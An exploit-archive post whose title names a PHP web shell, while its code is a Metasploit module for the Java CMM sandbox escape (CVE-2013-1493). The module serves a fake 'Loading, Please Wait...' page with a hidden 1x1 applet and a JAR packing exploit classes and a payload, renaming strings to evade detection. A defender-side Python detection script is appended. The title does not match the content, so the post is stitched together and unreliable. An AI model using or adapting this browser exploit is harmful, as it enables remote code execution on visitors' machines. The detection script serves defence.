STUNSHELL PHP Web Shell Remote Code Execution

Posted on 2013-4-4 17:31:17
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({ :javascript => false })

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
        This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',       # Vulnerability discovery and Exploit
          'juan vazquez'   # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Load the precompiled applet classes shipped under data/exploits/cve-2013-1493
  # and give the entry class a random four-letter name.
  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }

    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      # Requests for the archive get the payload JAR plus the four applet classes.
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      # Replace the fixed "metasploit"/"Payload" strings in entry names and bodies.
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      # Requests for the resource root get the landing page that embeds the applet.
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|

    return html
  end

end
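As an added defender-side check, not part of the post or of the Metasploit module, the script below flags the two artefacts the module's landing page and JAR handler produce: a 1x1 applet tag whose archive is an 8-letter random name and whose code attribute is a 4-letter random class, and a JAR that carries Leak.class, MyBufferedImage.class and MyColorSpace.class. The sample HTML and JAR are constructed inline and contain no bytecode.

```python
import io
import re
import zipfile

# generate_html emits exactly:
#   <applet archive="<8 letters>.jar" code="<4 letters>.class" width="1" height="1">
APPLET_RE = re.compile(
    r'<applet\s+archive="(?P<jar>[A-Za-z]{8}\.jar)"\s+code="(?P<code>[A-Za-z]{4}\.class)"'
    r'\s+width="1"\s+height="1"\s*>', re.IGNORECASE)

# Fixed class names the JAR handler packs; the Init class is renamed, so it is not listed.
SUSPECT_CLASSES = frozenset({"Leak.class", "MyBufferedImage.class", "MyColorSpace.class"})

def html_indicators(html):
    """Return the applet archive/code names when the page matches the landing page, else {}."""
    m = APPLET_RE.search(html)
    return {"jar": m.group("jar"), "code": m.group("code")} if m else {}

def jar_indicators(jar_bytes):
    """Return the suspect class entries present in a JAR (a plain ZIP archive)."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        return set(zf.namelist()) & SUSPECT_CLASSES

def is_cve_2013_1493_delivery(html, jar_bytes):
    """True when the page embeds the 1x1 applet and its JAR carries all three exploit classes."""
    return bool(html_indicators(html)) and jar_indicators(jar_bytes) == SUSPECT_CLASSES

def build_sample_jar(class_names):
    """Constructed sample JAR: named entries with empty bodies, no real bytecode."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        for name in class_names:
            zf.writestr(name, b"")
    return buf.getvalue()

# Constructed copy of what generate_html returns, with fixed stand-ins for the random names.
SAMPLE_HTML = ('<html><head><title>Loading, Please Wait...</title></head>'
               '<body><center><p>Loading, Please Wait...</p></center>'
               '<applet archive="qwertyui.jar" code="abcd.class" width="1" height="1">'
               '</applet></body></html>')

if __name__ == "__main__":
    sample_jar = build_sample_jar(["abcd.class", *sorted(SUSPECT_CLASSES)])
    print(html_indicators(SAMPLE_HTML), jar_indicators(sample_jar))
    print("delivery pattern matched:", is_cve_2013_1493_delivery(SAMPLE_HTML, sample_jar))
```

The applet regex is tied to the exact attribute order and sizes in generate_html, so a proxy or sensor rule built from it should also record the three class names as a second, order-independent indicator.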